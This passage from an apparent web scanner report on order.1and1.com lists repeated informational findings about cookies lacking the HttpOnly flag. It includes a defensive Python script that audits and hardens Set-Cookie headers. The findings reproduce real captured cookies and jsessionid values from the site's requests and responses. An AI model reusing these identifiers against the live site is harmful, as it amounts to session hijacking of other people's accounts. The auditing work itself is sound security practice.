Location: http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt;jsessionid=857A245A566851E43E294A4EDDB81C35.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.61. http://order.1and1.com/xml/order/FeatureServerFirewall

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerFirewall

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerFirewall HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:46 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2a662dae85f36400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerFirewall;jsessionid=A860AD88F46B29A5B4DEFDFDCEF7F2EA.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.62. http://order.1and1.com/xml/order/FeatureServerHarddrive

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerHarddrive

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerHarddrive HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:56 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3615648872672000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerHarddrive;jsessionid=8192B227548EAC6F717DC5CF967F86A5.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.63. http://order.1and1.com/xml/order/FeatureServerMonitoring

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoring

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerMonitoring HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:50:25 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2f065831d35d1400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoring;jsessionid=49458D6E362E5ABB5A84001887BEC3BE.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.64. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerMonitoringCloud

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerMonitoringCloud HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:10 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4d33fa49f0c72000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerMonitoringCloud;jsessionid=A4CBB6C182353045EF0AA3B3DB343B02.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.65. http://order.1and1.com/xml/order/FeatureServerProcessor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerProcessor

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerProcessor HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:23 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=52d42869220c5000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerProcessor;jsessionid=4E645A6B42402C8902E266243290193B.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.66. http://order.1and1.com/xml/order/FeatureServerRecovery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerRecovery

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerRecovery HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2ee9ff185893a000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerRecovery;jsessionid=FF636E41CA9B345C50F315CAEB1B41EE.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.67. http://order.1and1.com/xml/order/FeatureServerSsl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerSsl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerSsl HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:43 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2c6856928977d800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerSsl;jsessionid=4162E685F59ACF37EFCE2B660FED94F4.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.68. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsLinux

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerVpsOsLinux HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:36 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3f8e9c0500a60000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsLinux;jsessionid=DD61330651B1991C158C5E2A1045EF60.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.69. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureServerVpsOsWindows

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureServerVpsOsWindows HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:48 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=517ca537a4bc3c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureServerVpsOsWindows;jsessionid=479C7F1B739D311AC711741F227EFA3F.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.70. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingAsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingAsp HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:41:49 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=23f729c028981800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureSite-buildingAsp;jsessionid=90DC64BF5F0BE5FFD3494F531FFC9C21.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.71. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:47:19 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:26 GMT; Path=/
ETag: a52fac593cbd71846d3039342fde5fda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
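
The check behind these findings, as an added example that is not part of the scanner report: a Python script that parses each Set-Cookie header in a raw HTTP response, reports cookies lacking HttpOnly (and, for TLS hosts, Secure), and flags cookie names that look like session identifiers. HttpOnly matters because it stops script running in the page, for instance through a cross-site scripting flaw, from reading the cookie via document.cookie. The sample responses are constructed from the 302 and 200 responses shown in this report (the UT value is shortened); the session-name pattern SESSION_NAME_RE, the CookieFinding class and the function names are this script's own assumptions, not anything from the application or the scanner. In these responses the session identifier travels in the URL path (;jsessionid=...) rather than in UT or __PFIX_TST_, which is why the scanner rates the cookies as Information.

```python
"""Audit Set-Cookie headers for missing HttpOnly / Secure attributes.

Added example for this report; not the scanner's own code. The sample
responses below are constructed from the headers shown in the report.
"""
import re
from dataclasses import dataclass, field

# Heuristic for cookie names that usually carry a session identifier.
# This pattern is an assumption of this script; extend it for your application.
SESSION_NAME_RE = re.compile(r"sess|sid|auth|token|login", re.IGNORECASE)


@dataclass
class CookieFinding:
    name: str
    value: str
    attributes: dict            # lower-cased attribute name -> value ("" if bare)
    missing: list = field(default_factory=list)
    looks_like_session: bool = False


def parse_set_cookie(header_value: str) -> CookieFinding:
    """Split one Set-Cookie value into name, value and an attribute map.

    Attribute names are case-insensitive per RFC 6265, so they are lower-cased.
    A trailing ';' (as seen in the report's Cookie headers) is tolerated.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attributes = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attributes[key.strip().lower()] = val.strip()
    return CookieFinding(name=name.strip(), value=value, attributes=attributes)


def audit_set_cookie(header_value: str, over_tls: bool = True) -> CookieFinding:
    """Report which protective attributes one Set-Cookie header lacks."""
    finding = parse_set_cookie(header_value)
    if "httponly" not in finding.attributes:
        finding.missing.append("HttpOnly")
    # Secure only makes sense for a host served over TLS; the report's
    # requests went over plain HTTP, so callers pass over_tls=False for them.
    if over_tls and "secure" not in finding.attributes:
        finding.missing.append("Secure")
    finding.looks_like_session = bool(SESSION_NAME_RE.search(finding.name))
    return finding


def audit_response(raw_response: str, over_tls: bool = True) -> list:
    """Audit every Set-Cookie header in a raw HTTP response."""
    # Only the header block matters; stop at the first blank line.
    head = raw_response.split("\r\n\r\n", 1)[0].split("\n\n", 1)[0]
    findings = []
    for line in head.splitlines():
        key, _, val = line.partition(":")
        if key.strip().lower() == "set-cookie":
            findings.append(audit_set_cookie(val.strip(), over_tls))
    return findings


def harden_set_cookie(header_value: str, over_tls: bool = True) -> str:
    """Append missing attributes, as a reverse-proxy header rewrite would.

    Idempotent: a header that already carries the attributes is returned as-is.
    """
    present = parse_set_cookie(header_value).attributes
    out = header_value.rstrip().rstrip(";")
    if "httponly" not in present:
        out += "; HttpOnly"
    if over_tls and "secure" not in present:
        out += "; Secure"
    return out


# Constructed samples: headers copied from responses in this report
# (the UT value is shortened; Location carries the session id in the URL).
SAMPLE_302 = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: __PFIX_TST_=243737f9e62df400; Path=/\r\n"
    "Location: http://order.1and1.com/xml/order/FeatureSite-buildingBlog"
    ";jsessionid=EF0768155A7F7D2C704B8F00B5188B4C.TCpfix142a\r\n"
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_200 = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: UT=6aV4uMTIoUVFRS3Vr; Expires=Fri, 07-Apr-2079 22:01:26 GMT; Path=/\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n\r\n"
    "<!DOCTYPE html>\r\n"
)


if __name__ == "__main__":
    for label, raw in (("302", SAMPLE_302), ("200", SAMPLE_200)):
        for f in audit_response(raw, over_tls=False):
            kind = "session-like" if f.looks_like_session else "not session-like"
            print(f"{label}: cookie {f.name!r} missing {f.missing} ({kind})")
```

harden_set_cookie shows the effect of a front-end rewrite such as Apache mod_headers' `Header edit Set-Cookie ^(.*)$ "$1; HttpOnly"`; that is a stopgap, and the proper fix is to set the flag where the cookie is issued (for a servlet container, its session-cookie configuration, and in application code for cookies such as UT). Because every request in this report went over plain HTTP, the samples are audited with over_tls=False, so Secure is not reported for them.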

5.72. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingBlog

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__PFIX_TST_

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSite-buildingBlog HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
